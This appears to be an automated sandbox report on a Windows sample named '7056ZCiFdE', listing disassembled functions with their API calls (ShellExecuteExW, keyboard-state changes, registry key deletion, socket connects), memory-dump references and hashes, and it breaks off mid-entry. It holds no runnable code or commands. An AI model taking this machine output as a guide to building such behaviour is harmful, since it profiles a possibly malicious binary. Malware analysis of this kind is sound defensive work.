                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00906246
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00906257
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0090902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00906291
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009062B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: 40aaa623055ffbafb55da7038544bb66a572fc2851f088660390f7eb043c8ff9
                                    • Instruction ID: baee54af6f3a81cc944aec14bd5c0fc8a26289daface0f04077a39844e3822a8
                                    • Opcode Fuzzy Hash: 40aaa623055ffbafb55da7038544bb66a572fc2851f088660390f7eb043c8ff9
                                    • Instruction Fuzzy Hash: 0F317A72214214BFEF208F14CC8AFAA3BADEF4A765F044065FE08DA291C7759951CBA0
                                    Function 008DBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: 503316875de1510b59ca7aeddad7f3bf1171db50915a06a9239db53110a22f53
                                    • Instruction ID: 1e10bf157240f10f3b0986fdc7ea64614528d58ad572cc1de3449335ca244d13
                                    • Opcode Fuzzy Hash: 503316875de1510b59ca7aeddad7f3bf1171db50915a06a9239db53110a22f53
                                    • Instruction Fuzzy Hash: EF21BD61702209AAAA0476299D42FFB735DFF5535CF054122FD05D6B43EB24DE2083A6
                                    Function 00881424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8a3306f1c2689daed92d67a9ee12de313c5d125dca2f665366a92fecdb0e2ea4
                                    • Instruction ID: b7bb1d6028a0746a4fda0701b8f079ab50524a39d32294f9fa5b5529fb5d93f3
                                    • Opcode Fuzzy Hash: 8a3306f1c2689daed92d67a9ee12de313c5d125dca2f665366a92fecdb0e2ea4
                                    • Instruction Fuzzy Hash: D5717C30904109EFCF14DF98CC48ABEBB79FF85314F148159F915EA251CB34AA52CBA8
                                    Function 0090B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(01562660), ref: 0090B3EB
                                    • IsWindowEnabled.USER32(01562660), ref: 0090B3F7
                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0090B4DB
                                    • SendMessageW.USER32(01562660,000000B0,?,?), ref: 0090B512
                                    • IsDlgButtonChecked.USER32(?,?), ref: 0090B54F
                                    • GetWindowLongW.USER32(01562660,000000EC), ref: 0090B571
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0090B589
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                    • String ID:
                                    • API String ID: 4072528602-0
                                    • Opcode ID: c5d70b793106cf5f7c38877b588843844acaa3eb13030a45fca3b830ac6077f5
                                    • Instruction ID: ec9e909ef6d55a922f363f2cbaa06a4247a331dff847f6fc240669daa5642719
                                    • Opcode Fuzzy Hash: c5d70b793106cf5f7c38877b588843844acaa3eb13030a45fca3b830ac6077f5
                                    • Instruction Fuzzy Hash: C6718D34605204EFDB209F54C8A4FBABBBAEF49300F144569FA55972E2C732AA41DB50
                                    Function 008FF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 008FF448
                                    • _memset.LIBCMT ref: 008FF511
                                    • ShellExecuteExW.SHELL32(?), ref: 008FF556
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                      • Part of subcall function 0089FC86: _wcscpy.LIBCMT ref: 0089FCA9
                                    • GetProcessId.KERNEL32(00000000), ref: 008FF5CD
                                    • CloseHandle.KERNEL32(00000000), ref: 008FF5FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                    • String ID: @
                                    • API String ID: 3522835683-2766056989
                                    • Opcode ID: 749913d6a983e6528ebcadb20c3f780781a6f0fe84200f496ddfe30a2c567cce
                                    • Instruction ID: 816ead354416cbdafaad82a72fa32d4dedb17ad5a98c03cfbb8cb2fc47a8d69b
                                    • Opcode Fuzzy Hash: 749913d6a983e6528ebcadb20c3f780781a6f0fe84200f496ddfe30a2c567cce
                                    • Instruction Fuzzy Hash: 3061AE75A006199FCF14EF68C4819AEBBF5FF49314F148069E95AEB752CB30AD41CB81
                                    Function 008E0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(?), ref: 008E0F8C
                                    • GetKeyboardState.USER32(?), ref: 008E0FA1
                                    • SetKeyboardState.USER32(?), ref: 008E1002
                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 008E1030
                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 008E104F
                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 008E1095
                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008E10B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: f8179aff22a19a73c4d77206caba15ab5ae20d02e906c8b02b2bfdfae85912cf
                                    • Instruction ID: a6266d93ab8678861d7c548ad40ae68681831c163210e16f7988730c2ac91a29
                                    • Opcode Fuzzy Hash: f8179aff22a19a73c4d77206caba15ab5ae20d02e906c8b02b2bfdfae85912cf
                                    • Instruction Fuzzy Hash: 1251C170618AD53DFF3642358C19BB6BEA9BB07304F084989E1D5C58C3C6E5D8D8DB51
                                    Function 008E0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(00000000), ref: 008E0DA5
                                    • GetKeyboardState.USER32(?), ref: 008E0DBA
                                    • SetKeyboardState.USER32(?), ref: 008E0E1B
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008E0E47
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008E0E64
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008E0EA8
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008E0EC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 7c15f587591ba55324bf351d6740790dd74c909807f94138e8d50ea909227f6f
                                    • Instruction ID: 87037d3479e6f8e272551f2bd5c3c9a9e73e50da9a9c314b346689b72a63b2cb
                                    • Opcode Fuzzy Hash: 7c15f587591ba55324bf351d6740790dd74c909807f94138e8d50ea909227f6f
                                    • Instruction Fuzzy Hash: 7D51D5A05087D63DFB3282658C55B7A7EA9FB07300F084D99E1D4D68C2C7D5ACD8EB51
                                    Function 008E55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _wcsncpy$LocalTime
                                    • String ID:
                                    • API String ID: 2945705084-0
                                    • Opcode ID: 602206b19cf8dc603487fa7dc6eaeb6e7d4908eec8f3c84f44b53526518710fb
                                    • Instruction ID: 64b0d5c537ba2825a043b269c038f8b4989fa7d522ce64efa4ad6a3e1ff92015
                                    • Opcode Fuzzy Hash: 602206b19cf8dc603487fa7dc6eaeb6e7d4908eec8f3c84f44b53526518710fb
                                    • Instruction Fuzzy Hash: EE41B365C10618B6DB11EBBC8C46ACFB3B8FF06310F508856F558E3621EA34E256C7A7
                                    Function 008E3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008E466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008E3697,?), ref: 008E468B
                                      • Part of subcall function 008E466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008E3697,?), ref: 008E46A4
                                    • lstrcmpiW.KERNEL32(?,?), ref: 008E36B7
                                    • _wcscmp.LIBCMT ref: 008E36D3
                                    • MoveFileW.KERNEL32(?,?), ref: 008E36EB
                                    • _wcscat.LIBCMT ref: 008E3733
                                    • SHFileOperationW.SHELL32(?), ref: 008E379F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 1377345388-1173974218
                                    • Opcode ID: a1bfe0627a42d8ba9c3dd8f2bf42c8428b77711e8198e9266c64540123935b97
                                    • Instruction ID: 2a1c213a72a0b06423e43020fe907704c1da7335884ab7f90e37191f991818ec
                                    • Opcode Fuzzy Hash: a1bfe0627a42d8ba9c3dd8f2bf42c8428b77711e8198e9266c64540123935b97
                                    • Instruction Fuzzy Hash: 6541817150C384AED751EF69C4459DF77E8FF8A390F00182EB49AC3261EA34D689C752
                                    Function 00907291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009072AA
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00907351
                                    • IsMenu.USER32(?), ref: 00907369
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009073B1
                                    • DrawMenuBar.USER32 ref: 009073C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                    • String ID: 0
                                    • API String ID: 3866635326-4108050209
                                    • Opcode ID: 0a1de555eb658759ce3b1eeb5c0a51f30a42af7dd60a40fc132db336b477ecf4
                                    • Instruction ID: 75edf1561300b166e472fcec8df677d32eb7485a0931b6bf78cf1f3639c6a081
                                    • Opcode Fuzzy Hash: 0a1de555eb658759ce3b1eeb5c0a51f30a42af7dd60a40fc132db336b477ecf4
                                    • Instruction Fuzzy Hash: 5A412975A04208EFEB20DF94E884EAABBF9FB05320F148529FD5597290D730AD50EF50
                                    Function 00900FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00900FD4
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00900FFE
                                    • FreeLibrary.KERNEL32(00000000), ref: 009010B5
                                      • Part of subcall function 00900FA5: RegCloseKey.ADVAPI32(?), ref: 0090101B
                                      • Part of subcall function 00900FA5: FreeLibrary.KERNEL32(?), ref: 0090106D
                                      • Part of subcall function 00900FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00901090
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00901058
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                    • String ID:
                                    • API String ID: 395352322-0
                                    • Opcode ID: 5d6bca475eccd23b6856839f67e96b0f372a703550fe3d878007691722010a6f
                                    • Instruction ID: ce846032c8108e4ba62bc800cf8fc43f3c2fe51d9fcb34734553dd7e4241ec1f
                                    • Opcode Fuzzy Hash: 5d6bca475eccd23b6856839f67e96b0f372a703550fe3d878007691722010a6f
                                    • Instruction Fuzzy Hash: 69310D71915109BFEB259F90DC99EFFB7BCEF09300F000169E541E2191EB749F859AA0
                                    Function 009062CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009062EC
                                    • GetWindowLongW.USER32(01562660,000000F0), ref: 0090631F
                                    • GetWindowLongW.USER32(01562660,000000F0), ref: 00906354
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00906386
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009063B0
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009063C1
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009063DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: 3e166dd75f8f61b29bdc1cc3d37d15cdf73040d7b4ba048ea040c73ec1a95b56
                                    • Instruction ID: 7008d97bb4ccb34a9c8163803faf2e27103e17ed0344feabb19f7854ad8989af
                                    • Opcode Fuzzy Hash: 3e166dd75f8f61b29bdc1cc3d37d15cdf73040d7b4ba048ea040c73ec1a95b56
                                    • Instruction Fuzzy Hash: 61311F35608255AFDB20CF58DC88F593BE9FB4A714F1901A8F5009F2F2CB72A950EB90
                                    Function 008DDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DDB2E
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DDB54
                                    • SysAllocString.OLEAUT32(00000000), ref: 008DDB57
                                    • SysAllocString.OLEAUT32(?), ref: 008DDB75
                                    • SysFreeString.OLEAUT32(?), ref: 008DDB7E
                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 008DDBA3
                                    • SysAllocString.OLEAUT32(?), ref: 008DDBB1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: 8b94ef12ecf37357db227a930092d329048e4a53bea0a4b98012fe24988801fb
                                    • Instruction ID: 74dfcb49ea165da60093475433204b43d9851cf354b439c5d572f7246bc060b7
                                    • Opcode Fuzzy Hash: 8b94ef12ecf37357db227a930092d329048e4a53bea0a4b98012fe24988801fb
                                    • Instruction Fuzzy Hash: 56216B36604319AFDB10AFA8DC88CBB73ACFB09364B018626FD14DB2A0D6709D419B60
                                    Function 008F6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008F7D8B: inet_addr.WS2_32(00000000), ref: 008F7DB6
                                    • socket.WS2_32(00000002,00000001,00000006), ref: 008F61C6
                                    • WSAGetLastError.WS2_32(00000000), ref: 008F61D5
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 008F620E
                                    • connect.WSOCK32(00000000,?,00000010), ref: 008F6217
                                    • WSAGetLastError.WS2_32 ref: 008F6221
                                    • closesocket.WS2_32(00000000), ref: 008F624A
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 008F6263
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                    • String ID:
                                    • API String ID: 910771015-0
                                    • Opcode ID: 65686214e21971ff80e5e72c3bc1935c81de1600ef98df4385123c0879ce57b6
                                    • Instruction ID: 3fbfccd453376590c80935f43e0cfd1c3cb66ce6fdb8a2cd881620f889a4be5a
                                    • Opcode Fuzzy Hash: 65686214e21971ff80e5e72c3bc1935c81de1600ef98df4385123c0879ce57b6
